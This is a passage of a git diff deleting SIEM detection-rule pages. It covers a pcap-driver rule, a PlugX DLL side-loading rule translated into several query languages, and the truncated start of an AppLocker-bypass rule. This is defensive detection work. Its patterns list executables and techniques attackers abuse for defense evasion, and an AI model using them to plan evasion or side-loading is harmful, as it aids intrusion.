-    "query": "(winlog.event_id:\"4697\" AND winlog.event_data.ServiceFileName.keyword:(*pcap* OR *npcap* OR *npf* OR *nm3* OR *ndiscap* OR *nmnt* OR *windivert* OR *USBPcap* OR *pktmon*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_id:\"4697\" AND winlog.event_data.ServiceFileName.keyword:(*pcap* OR *npcap* OR *npf* OR *nm3* OR *ndiscap* OR *nmnt* OR *windivert* OR *USBPcap* OR *pktmon*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Windows Pcap Drivers'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n             EventID = {{_source.EventID}}\n     ServiceFileName = {{_source.ServiceFileName}}\n        Account_Name = {{_source.Account_Name}}\n       Computer_Name = {{_source.Computer_Name}}\nOriginating_Computer = {{_source.Originating_Computer}}\n         ServiceName = {{_source.ServiceName}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"4697" AND ServiceFileName.keyword:(*pcap* *npcap* *npf* *nm3* *ndiscap* *nmnt* *windivert* *USBPcap* *pktmon*))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:System" EventCode="4697" (ServiceFileName="*pcap*" OR ServiceFileName="*npcap*" OR ServiceFileName="*npf*" OR ServiceFileName="*nm3*" OR ServiceFileName="*ndiscap*" OR ServiceFileName="*nmnt*" OR ServiceFileName="*windivert*" OR ServiceFileName="*USBPcap*" OR ServiceFileName="*pktmon*")) | table EventCode,ServiceFileName,Account_Name,Computer_Name,Originating_Computer,ServiceName
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id="4697" ServiceFileName IN ["*pcap*", "*npcap*", "*npf*", "*nm3*", "*ndiscap*", "*nmnt*", "*windivert*", "*USBPcap*", "*pktmon*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*4697)(?=.*(?:.*.*pcap.*|.*.*npcap.*|.*.*npf.*|.*.*nm3.*|.*.*ndiscap.*|.*.*nmnt.*|.*.*windivert.*|.*.*USBPcap.*|.*.*pktmon.*)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_plugx_susp_exe_locations.md b/Atomic_Threat_Coverage/Detection_Rules/win_plugx_susp_exe_locations.md
deleted file mode 100644
index 75226e8..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_plugx_susp_exe_locations.md
+++ /dev/null
@@ -1,247 +0,0 @@
-| Title                    | Executable Used by PlugX in Uncommon Location       |
-|:-------------------------|:------------------|
-| **Description**          | Detects the execution of an executable that is typically used by PlugX for DLL side loading started from an uncommon location |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1073: DLL Side-Loading](https://attack.mitre.org/techniques/T1073)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0001_4688_windows_process_creation](../Data_Needed/DN0001_4688_windows_process_creation.md)</li><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[http://www.hexacorn.com/blog/2016/03/10/beyond-good-ol-run-key-part-36/](http://www.hexacorn.com/blog/2016/03/10/beyond-good-ol-run-key-part-36/)</li><li>[https://countuponsecurity.com/2017/06/07/threat-hunting-in-the-enterprise-with-appcompatprocessor/](https://countuponsecurity.com/2017/06/07/threat-hunting-in-the-enterprise-with-appcompatprocessor/)</li></ul>  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.s0013</li><li>attack.t1574.002</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Executable Used by PlugX in Uncommon Location
-id: aeab5ec5-be14-471a-80e8-e344418305c2
-status: experimental
-description: Detects the execution of an executable that is typically used by PlugX for DLL side loading started from an uncommon location
-references:
-    - http://www.hexacorn.com/blog/2016/03/10/beyond-good-ol-run-key-part-36/
-    - https://countuponsecurity.com/2017/06/07/threat-hunting-in-the-enterprise-with-appcompatprocessor/
-author: Florian Roth
-date: 2017/06/12
-tags:
-    - attack.s0013
-    - attack.defense_evasion
-    - attack.t1073
-    - attack.t1574.002
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection_cammute:
-        Image: '*\CamMute.exe'
-    filter_cammute:
-        Image: '*\Lenovo\Communication Utility\\*'
-    selection_chrome_frame:
-        Image: '*\chrome_frame_helper.exe'
-    filter_chrome_frame:
-        Image: '*\Google\Chrome\application\\*'
-    selection_devemu:
-        Image: '*\dvcemumanager.exe'
-    filter_devemu:
-        Image: '*\Microsoft Device Emulator\\*'
-    selection_gadget:
-        Image: '*\Gadget.exe'
-    filter_gadget:
-        Image: '*\Windows Media Player\\*'
-    selection_hcc:
-        Image: '*\hcc.exe'
-    filter_hcc:
-        Image: '*\HTML Help Workshop\\*'
-    selection_hkcmd:
-        Image: '*\hkcmd.exe'
-    filter_hkcmd:
-        Image:
-            - '*\System32\\*'
-            - '*\SysNative\\*'
-            - '*\SysWowo64\\*'
-    selection_mc:
-        Image: '*\Mc.exe'
-    filter_mc:
-        Image:
-            - '*\Microsoft Visual Studio*'
-            - '*\Microsoft SDK*'
-            - '*\Windows Kit*'
-    selection_msmpeng:
-        Image: '*\MsMpEng.exe'
-    filter_msmpeng:
-        Image:
-            - '*\Microsoft Security Client\\*'
-            - '*\Windows Defender\\*'
-            - '*\AntiMalware\\*'
-    selection_msseces:
-        Image: '*\msseces.exe'
-    filter_msseces:
-        Image:
-            - '*\Microsoft Security Center\\*'
-            - '*\Microsoft Security Client\\*'
-            - '*\Microsoft Security Essentials\\*'
-    selection_oinfo:
-        Image: '*\OInfoP11.exe'
-    filter_oinfo:
-        Image: '*\Common Files\Microsoft Shared\\*'
-    selection_oleview:
-        Image: '*\OleView.exe'
-    filter_oleview:
-        Image:
-            - '*\Microsoft Visual Studio*'
-            - '*\Microsoft SDK*'
-            - '*\Windows Kit*'
-            - '*\Windows Resource Kit\\*'
-    selection_rc:
-        Image: '*\rc.exe'
-    filter_rc:
-        Image:
-            - '*\Microsoft Visual Studio*'
-            - '*\Microsoft SDK*'
-            - '*\Windows Kit*'
-            - '*\Windows Resource Kit\\*'
-            - '*\Microsoft.NET\\*'
-    condition: ( selection_cammute and not filter_cammute ) or ( selection_chrome_frame and not filter_chrome_frame ) or ( selection_devemu and not filter_devemu ) or ( selection_gadget and not filter_gadget ) or ( selection_hcc and not filter_hcc ) or ( selection_hkcmd and not filter_hkcmd ) or ( selection_mc and not filter_mc ) or ( selection_msmpeng and not filter_msmpeng ) or ( selection_msseces and not filter_msseces ) or ( selection_oinfo and not filter_oinfo ) or ( selection_oleview and not filter_oleview ) or ( selection_rc and not filter_rc )
-fields:
-    - CommandLine
-    - ParentCommandLine
-falsepositives:
-    - Unknown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and (((((((((((($_.message -match "Image.*.*\\CamMute.exe" -and  -not ($_.message -match "Image.*.*\\Lenovo\\Communication Utility\\.*")) -or ($_.message -match "Image.*.*\\chrome_frame_helper.exe" -and  -not ($_.message -match "Image.*.*\\Google\\Chrome\\application\\.*"))) -or ($_.message -match "Image.*.*\\dvcemumanager.exe" -and  -not ($_.message -match "Image.*.*\\Microsoft Device Emulator\\.*"))) -or ($_.message -match "Image.*.*\\Gadget.exe" -and  -not ($_.message -match "Image.*.*\\Windows Media Player\\.*"))) -or ($_.message -match "Image.*.*\\hcc.exe" -and  -not ($_.message -match "Image.*.*\\HTML Help Workshop\\.*"))) -or ($_.message -match "Image.*.*\\hkcmd.exe" -and  -not (($_.message -match "Image.*.*\\System32\\.*" -or $_.message -match "Image.*.*\\SysNative\\.*" -or $_.message -match "Image.*.*\\SysWowo64\\.*")))) -or ($_.message -match "Image.*.*\\Mc.exe" -and  -not (($_.message -match "Image.*.*\\Microsoft Visual Studio.*" -or $_.message -match "Image.*.*\\Microsoft SDK.*" -or $_.message -match "Image.*.*\\Windows Kit.*")))) -or ($_.message -match "Image.*.*\\MsMpEng.exe" -and  -not (($_.message -match "Image.*.*\\Microsoft Security Client\\.*" -or $_.message -match "Image.*.*\\Windows Defender\\.*" -or $_.message -match "Image.*.*\\AntiMalware\\.*")))) -or ($_.message -match "Image.*.*\\msseces.exe" -and  -not (($_.message -match "Image.*.*\\Microsoft Security Center\\.*" -or $_.message -match "Image.*.*\\Microsoft Security Client\\.*" -or $_.message -match "Image.*.*\\Microsoft Security Essentials\\.*")))) -or ($_.message -match "Image.*.*\\OInfoP11.exe" -and  -not ($_.message -match "Image.*.*\\Common Files\\Microsoft Shared\\.*"))) -or ($_.message -match "Image.*.*\\OleView.exe" -and  -not (($_.message -match "Image.*.*\\Microsoft Visual Studio.*" -or $_.message -match "Image.*.*\\Microsoft SDK.*" -or $_.message -match "Image.*.*\\Windows Kit.*" -or $_.message -match "Image.*.*\\Windows Resource Kit\\.*")))) -or ($_.message -match "Image.*.*\\rc.exe" -and  -not (($_.message -match "Image.*.*\\Microsoft Visual Studio.*" -or $_.message -match "Image.*.*\\Microsoft SDK.*" -or $_.message -match "Image.*.*\\Windows Kit.*" -or $_.message -match "Image.*.*\\Windows Resource Kit\\.*" -or $_.message -match "Image.*.*\\Microsoft.NET\\.*"))))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-((((((((((((winlog.event_data.Image.keyword:*\\CamMute.exe AND (NOT (winlog.event_data.Image.keyword:*\\Lenovo\\Communication\ Utility\\*))) OR (winlog.event_data.Image.keyword:*\\chrome_frame_helper.exe AND (NOT (winlog.event_data.Image.keyword:*\\Google\\Chrome\\application\\*)))) OR (winlog.event_data.Image.keyword:*\\dvcemumanager.exe AND (NOT (winlog.event_data.Image.keyword:*\\Microsoft\ Device\ Emulator\\*)))) OR (winlog.event_data.Image.keyword:*\\Gadget.exe AND (NOT (winlog.event_data.Image.keyword:*\\Windows\ Media\ Player\\*)))) OR (winlog.event_data.Image.keyword:*\\hcc.exe AND (NOT (winlog.event_data.Image.keyword:*\\HTML\ Help\ Workshop\\*)))) OR (winlog.event_data.Image.keyword:*\\hkcmd.exe AND (NOT (winlog.event_data.Image.keyword:(*\\System32\\* OR *\\SysNative\\* OR *\\SysWowo64\\*))))) OR (winlog.event_data.Image.keyword:*\\Mc.exe AND (NOT (winlog.event_data.Image.keyword:(*\\Microsoft\ Visual\ Studio* OR *\\Microsoft\ SDK* OR *\\Windows\ Kit*))))) OR (winlog.event_data.Image.keyword:*\\MsMpEng.exe AND (NOT (winlog.event_data.Image.keyword:(*\\Microsoft\ Security\ Client\\* OR *\\Windows\ Defender\\* OR *\\AntiMalware\\*))))) OR (winlog.event_data.Image.keyword:*\\msseces.exe AND (NOT (winlog.event_data.Image.keyword:(*\\Microsoft\ Security\ Center\\* OR *\\Microsoft\ Security\ Client\\* OR *\\Microsoft\ Security\ Essentials\\*))))) OR (winlog.event_data.Image.keyword:*\\OInfoP11.exe AND (NOT (winlog.event_data.Image.keyword:*\\Common\ Files\\Microsoft\ Shared\\*)))) OR (winlog.event_data.Image.keyword:*\\OleView.exe AND (NOT (winlog.event_data.Image.keyword:(*\\Microsoft\ Visual\ Studio* OR *\\Microsoft\ SDK* OR *\\Windows\ Kit* OR *\\Windows\ Resource\ Kit\\*))))) OR (winlog.event_data.Image.keyword:*\\rc.exe AND (NOT (winlog.event_data.Image.keyword:(*\\Microsoft\ Visual\ Studio* OR *\\Microsoft\ SDK* OR *\\Windows\ Kit* OR *\\Windows\ Resource\ Kit\\* OR *\\Microsoft.NET\\*)))))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/aeab5ec5-be14-471a-80e8-e344418305c2 <<EOF
-{
-  "metadata": {
-    "title": "Executable Used by PlugX in Uncommon Location",
-    "description": "Detects the execution of an executable that is typically used by PlugX for DLL side loading started from an uncommon location",
-    "tags": [
-      "attack.s0013",
-      "attack.defense_evasion",
-      "attack.t1073",
-      "attack.t1574.002"
-    ],
-    "query": "((((((((((((winlog.event_data.Image.keyword:*\\\\CamMute.exe AND (NOT (winlog.event_data.Image.keyword:*\\\\Lenovo\\\\Communication\\ Utility\\\\*))) OR (winlog.event_data.Image.keyword:*\\\\chrome_frame_helper.exe AND (NOT (winlog.event_data.Image.keyword:*\\\\Google\\\\Chrome\\\\application\\\\*)))) OR (winlog.event_data.Image.keyword:*\\\\dvcemumanager.exe AND (NOT (winlog.event_data.Image.keyword:*\\\\Microsoft\\ Device\\ Emulator\\\\*)))) OR (winlog.event_data.Image.keyword:*\\\\Gadget.exe AND (NOT (winlog.event_data.Image.keyword:*\\\\Windows\\ Media\\ Player\\\\*)))) OR (winlog.event_data.Image.keyword:*\\\\hcc.exe AND (NOT (winlog.event_data.Image.keyword:*\\\\HTML\\ Help\\ Workshop\\\\*)))) OR (winlog.event_data.Image.keyword:*\\\\hkcmd.exe AND (NOT (winlog.event_data.Image.keyword:(*\\\\System32\\\\* OR *\\\\SysNative\\\\* OR *\\\\SysWowo64\\\\*))))) OR (winlog.event_data.Image.keyword:*\\\\Mc.exe AND (NOT (winlog.event_data.Image.keyword:(*\\\\Microsoft\\ Visual\\ Studio* OR *\\\\Microsoft\\ SDK* OR *\\\\Windows\\ Kit*))))) OR (winlog.event_data.Image.keyword:*\\\\MsMpEng.exe AND (NOT (winlog.event_data.Image.keyword:(*\\\\Microsoft\\ Security\\ Client\\\\* OR *\\\\Windows\\ Defender\\\\* OR *\\\\AntiMalware\\\\*))))) OR (winlog.event_data.Image.keyword:*\\\\msseces.exe AND (NOT (winlog.event_data.Image.keyword:(*\\\\Microsoft\\ Security\\ Center\\\\* OR *\\\\Microsoft\\ Security\\ Client\\\\* OR *\\\\Microsoft\\ Security\\ Essentials\\\\*))))) OR (winlog.event_data.Image.keyword:*\\\\OInfoP11.exe AND (NOT (winlog.event_data.Image.keyword:*\\\\Common\\ Files\\\\Microsoft\\ Shared\\\\*)))) OR (winlog.event_data.Image.keyword:*\\\\OleView.exe AND (NOT (winlog.event_data.Image.keyword:(*\\\\Microsoft\\ Visual\\ Studio* OR *\\\\Microsoft\\ SDK* OR *\\\\Windows\\ Kit* OR *\\\\Windows\\ Resource\\ Kit\\\\*))))) OR (winlog.event_data.Image.keyword:*\\\\rc.exe AND (NOT (winlog.event_data.Image.keyword:(*\\\\Microsoft\\ Visual\\ Studio* OR *\\\\Microsoft\\ SDK* OR *\\\\Windows\\ Kit* OR *\\\\Windows\\ Resource\\ Kit\\\\* OR *\\\\Microsoft.NET\\\\*)))))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "((((((((((((winlog.event_data.Image.keyword:*\\\\CamMute.exe AND (NOT (winlog.event_data.Image.keyword:*\\\\Lenovo\\\\Communication\\ Utility\\\\*))) OR (winlog.event_data.Image.keyword:*\\\\chrome_frame_helper.exe AND (NOT (winlog.event_data.Image.keyword:*\\\\Google\\\\Chrome\\\\application\\\\*)))) OR (winlog.event_data.Image.keyword:*\\\\dvcemumanager.exe AND (NOT (winlog.event_data.Image.keyword:*\\\\Microsoft\\ Device\\ Emulator\\\\*)))) OR (winlog.event_data.Image.keyword:*\\\\Gadget.exe AND (NOT (winlog.event_data.Image.keyword:*\\\\Windows\\ Media\\ Player\\\\*)))) OR (winlog.event_data.Image.keyword:*\\\\hcc.exe AND (NOT (winlog.event_data.Image.keyword:*\\\\HTML\\ Help\\ Workshop\\\\*)))) OR (winlog.event_data.Image.keyword:*\\\\hkcmd.exe AND (NOT (winlog.event_data.Image.keyword:(*\\\\System32\\\\* OR *\\\\SysNative\\\\* OR *\\\\SysWowo64\\\\*))))) OR (winlog.event_data.Image.keyword:*\\\\Mc.exe AND (NOT (winlog.event_data.Image.keyword:(*\\\\Microsoft\\ Visual\\ Studio* OR *\\\\Microsoft\\ SDK* OR *\\\\Windows\\ Kit*))))) OR (winlog.event_data.Image.keyword:*\\\\MsMpEng.exe AND (NOT (winlog.event_data.Image.keyword:(*\\\\Microsoft\\ Security\\ Client\\\\* OR *\\\\Windows\\ Defender\\\\* OR *\\\\AntiMalware\\\\*))))) OR (winlog.event_data.Image.keyword:*\\\\msseces.exe AND (NOT (winlog.event_data.Image.keyword:(*\\\\Microsoft\\ Security\\ Center\\\\* OR *\\\\Microsoft\\ Security\\ Client\\\\* OR *\\\\Microsoft\\ Security\\ Essentials\\\\*))))) OR (winlog.event_data.Image.keyword:*\\\\OInfoP11.exe AND (NOT (winlog.event_data.Image.keyword:*\\\\Common\\ Files\\\\Microsoft\\ Shared\\\\*)))) OR (winlog.event_data.Image.keyword:*\\\\OleView.exe AND (NOT (winlog.event_data.Image.keyword:(*\\\\Microsoft\\ Visual\\ Studio* OR *\\\\Microsoft\\ SDK* OR *\\\\Windows\\ Kit* OR *\\\\Windows\\ Resource\\ Kit\\\\*))))) OR (winlog.event_data.Image.keyword:*\\\\rc.exe AND (NOT (winlog.event_data.Image.keyword:(*\\\\Microsoft\\ Visual\\ Studio* OR *\\\\Microsoft\\ SDK* OR *\\\\Windows\\ Kit* OR *\\\\Windows\\ Resource\\ Kit\\\\* OR *\\\\Microsoft.NET\\\\*)))))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Executable Used by PlugX in Uncommon Location'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((((((((((((Image.keyword:*\\CamMute.exe AND (NOT (Image.keyword:*\\Lenovo\\Communication Utility\\*))) OR (Image.keyword:*\\chrome_frame_helper.exe AND (NOT (Image.keyword:*\\Google\\Chrome\\application\\*)))) OR (Image.keyword:*\\dvcemumanager.exe AND (NOT (Image.keyword:*\\Microsoft Device Emulator\\*)))) OR (Image.keyword:*\\Gadget.exe AND (NOT (Image.keyword:*\\Windows Media Player\\*)))) OR (Image.keyword:*\\hcc.exe AND (NOT (Image.keyword:*\\HTML Help Workshop\\*)))) OR (Image.keyword:*\\hkcmd.exe AND (NOT (Image.keyword:(*\\System32\\* *\\SysNative\\* *\\SysWowo64\\*))))) OR (Image.keyword:*\\Mc.exe AND (NOT (Image.keyword:(*\\Microsoft Visual Studio* *\\Microsoft SDK* *\\Windows Kit*))))) OR (Image.keyword:*\\MsMpEng.exe AND (NOT (Image.keyword:(*\\Microsoft Security Client\\* *\\Windows Defender\\* *\\AntiMalware\\*))))) OR (Image.keyword:*\\msseces.exe AND (NOT (Image.keyword:(*\\Microsoft Security Center\\* *\\Microsoft Security Client\\* *\\Microsoft Security Essentials\\*))))) OR (Image.keyword:*\\OInfoP11.exe AND (NOT (Image.keyword:*\\Common Files\\Microsoft Shared\\*)))) OR (Image.keyword:*\\OleView.exe AND (NOT (Image.keyword:(*\\Microsoft Visual Studio* *\\Microsoft SDK* *\\Windows Kit* *\\Windows Resource Kit\\*))))) OR (Image.keyword:*\\rc.exe AND (NOT (Image.keyword:(*\\Microsoft Visual Studio* *\\Microsoft SDK* *\\Windows Kit* *\\Windows Resource Kit\\* *\\Microsoft.NET\\*)))))
-```
-
-
-### splunk
-    
-```
-((((((((((((Image="*\\CamMute.exe" NOT (Image="*\\Lenovo\\Communication Utility\\*")) OR (Image="*\\chrome_frame_helper.exe" NOT (Image="*\\Google\\Chrome\\application\\*"))) OR (Image="*\\dvcemumanager.exe" NOT (Image="*\\Microsoft Device Emulator\\*"))) OR (Image="*\\Gadget.exe" NOT (Image="*\\Windows Media Player\\*"))) OR (Image="*\\hcc.exe" NOT (Image="*\\HTML Help Workshop\\*"))) OR (Image="*\\hkcmd.exe" NOT ((Image="*\\System32\\*" OR Image="*\\SysNative\\*" OR Image="*\\SysWowo64\\*")))) OR (Image="*\\Mc.exe" NOT ((Image="*\\Microsoft Visual Studio*" OR Image="*\\Microsoft SDK*" OR Image="*\\Windows Kit*")))) OR (Image="*\\MsMpEng.exe" NOT ((Image="*\\Microsoft Security Client\\*" OR Image="*\\Windows Defender\\*" OR Image="*\\AntiMalware\\*")))) OR (Image="*\\msseces.exe" NOT ((Image="*\\Microsoft Security Center\\*" OR Image="*\\Microsoft Security Client\\*" OR Image="*\\Microsoft Security Essentials\\*")))) OR (Image="*\\OInfoP11.exe" NOT (Image="*\\Common Files\\Microsoft Shared\\*"))) OR (Image="*\\OleView.exe" NOT ((Image="*\\Microsoft Visual Studio*" OR Image="*\\Microsoft SDK*" OR Image="*\\Windows Kit*" OR Image="*\\Windows Resource Kit\\*")))) OR (Image="*\\rc.exe" NOT ((Image="*\\Microsoft Visual Studio*" OR Image="*\\Microsoft SDK*" OR Image="*\\Windows Kit*" OR Image="*\\Windows Resource Kit\\*" OR Image="*\\Microsoft.NET\\*")))) | table CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" ((((((((((((Image="*\\CamMute.exe"  -(Image="*\\Lenovo\\Communication Utility\\*")) OR (Image="*\\chrome_frame_helper.exe"  -(Image="*\\Google\\Chrome\\application\\*"))) OR (Image="*\\dvcemumanager.exe"  -(Image="*\\Microsoft Device Emulator\\*"))) OR (Image="*\\Gadget.exe"  -(Image="*\\Windows Media Player\\*"))) OR (Image="*\\hcc.exe"  -(Image="*\\HTML Help Workshop\\*"))) OR (Image="*\\hkcmd.exe"  -(Image IN ["*\\System32\\*", "*\\SysNative\\*", "*\\SysWowo64\\*"]))) OR (Image="*\\Mc.exe"  -(Image IN ["*\\Microsoft Visual Studio*", "*\\Microsoft SDK*", "*\\Windows Kit*"]))) OR (Image="*\\MsMpEng.exe"  -(Image IN ["*\\Microsoft Security Client\\*", "*\\Windows Defender\\*", "*\\AntiMalware\\*"]))) OR (Image="*\\msseces.exe"  -(Image IN ["*\\Microsoft Security Center\\*", "*\\Microsoft Security Client\\*", "*\\Microsoft Security Essentials\\*"]))) OR (Image="*\\OInfoP11.exe"  -(Image="*\\Common Files\\Microsoft Shared\\*"))) OR (Image="*\\OleView.exe"  -(Image IN ["*\\Microsoft Visual Studio*", "*\\Microsoft SDK*", "*\\Windows Kit*", "*\\Windows Resource Kit\\*"]))) OR (Image="*\\rc.exe"  -(Image IN ["*\\Microsoft Visual Studio*", "*\\Microsoft SDK*", "*\\Windows Kit*", "*\\Windows Resource Kit\\*", "*\\Microsoft.NET\\*"]))))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?:.*(?:.*(?:.*(?:.*(?:.*(?:.*(?:.*(?:.*(?:.*(?:.*(?:.*(?:.*(?:.*(?:.*(?:.*(?:.*(?:.*(?:.*(?:.*(?:.*(?:.*(?:.*(?=.*.*\CamMute\.exe)(?=.*(?!.*(?:.*(?=.*.*\Lenovo\Communication Utility\\.*)))))|.*(?:.*(?=.*.*\chrome_frame_helper\.exe)(?=.*(?!.*(?:.*(?=.*.*\Google\Chrome\application\\.*)))))))|.*(?:.*(?=.*.*\dvcemumanager\.exe)(?=.*(?!.*(?:.*(?=.*.*\Microsoft Device Emulator\\.*)))))))|.*(?:.*(?=.*.*\Gadget\.exe)(?=.*(?!.*(?:.*(?=.*.*\Windows Media Player\\.*)))))))|.*(?:.*(?=.*.*\hcc\.exe)(?=.*(?!.*(?:.*(?=.*.*\HTML Help Workshop\\.*)))))))|.*(?:.*(?=.*.*\hkcmd\.exe)(?=.*(?!.*(?:.*(?=.*(?:.*.*\System32\\.*|.*.*\SysNative\\.*|.*.*\SysWowo64\\.*))))))))|.*(?:.*(?=.*.*\Mc\.exe)(?=.*(?!.*(?:.*(?=.*(?:.*.*\Microsoft Visual Studio.*|.*.*\Microsoft SDK.*|.*.*\Windows Kit.*))))))))|.*(?:.*(?=.*.*\MsMpEng\.exe)(?=.*(?!.*(?:.*(?=.*(?:.*.*\Microsoft Security Client\\.*|.*.*\Windows Defender\\.*|.*.*\AntiMalware\\.*))))))))|.*(?:.*(?=.*.*\msseces\.exe)(?=.*(?!.*(?:.*(?=.*(?:.*.*\Microsoft Security Center\\.*|.*.*\Microsoft Security Client\\.*|.*.*\Microsoft Security Essentials\\.*))))))))|.*(?:.*(?=.*.*\OInfoP11\.exe)(?=.*(?!.*(?:.*(?=.*.*\Common Files\Microsoft Shared\\.*)))))))|.*(?:.*(?=.*.*\OleView\.exe)(?=.*(?!.*(?:.*(?=.*(?:.*.*\Microsoft Visual Studio.*|.*.*\Microsoft SDK.*|.*.*\Windows Kit.*|.*.*\Windows Resource Kit\\.*))))))))|.*(?:.*(?=.*.*\rc\.exe)(?=.*(?!.*(?:.*(?=.*(?:.*.*\Microsoft Visual Studio.*|.*.*\Microsoft SDK.*|.*.*\Windows Kit.*|.*.*\Windows Resource Kit\\.*|.*.*\Microsoft\.NET\\.*))))))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_possible_applocker_bypass.md b/Atomic_Threat_Coverage/Detection_Rules/win_possible_applocker_bypass.md
deleted file mode 100644
index e6d91cd..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_possible_applocker_bypass.md
+++ /dev/null
@@ -1,191 +0,0 @@
-| Title                    | Possible Applocker Bypass       |
-|:-------------------------|:------------------|
-| **Description**          | Detects execution of executables that can be used to bypass Applocker whitelisting |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1118: InstallUtil](https://attack.mitre.org/techniques/T1118)</li><li>[T1121: Regsvcs/Regasm](https://attack.mitre.org/techniques/T1121)</li><li>[T1127: Trusted Developer Utilities Proxy Execution](https://attack.mitre.org/techniques/T1127)</li><li>[T1170: Mshta](https://attack.mitre.org/techniques/T1170)</li><li>[T1218: Signed Binary Proxy Execution](https://attack.mitre.org/techniques/T1218)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1218: Signed Binary Proxy Execution](../Triggers/T1218.md)</li></ul>  |
-| **Severity Level**       | low |
-| **False Positives**      | <ul><li>False positives depend on scripts and administrative tools used in the monitored environment</li><li>Using installutil to add features for .NET applications (primarly would occur in developer environments)</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/subTee/ApplicationWhitelistBypassTechniques/blob/master/TheList.txt](https://github.com/subTee/ApplicationWhitelistBypassTechniques/blob/master/TheList.txt)</li><li>[https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/](https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/)</li></ul>  |
-| **Author**               | juju4 |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Possible Applocker Bypass
-id: 82a19e3a-2bfe-4a91-8c0d-5d4c98fbb719
-description: Detects execution of executables that can be used to bypass Applocker whitelisting
-status: experimental
-references:
-    - https://github.com/subTee/ApplicationWhitelistBypassTechniques/blob/master/TheList.txt
-    - https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/
-author: juju4
-date: 2019/01/16
-tags:
-    - attack.defense_evasion
-    - attack.t1118
-    - attack.t1121
-    - attack.t1127
-    - attack.t1170
-    - attack.t1218
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
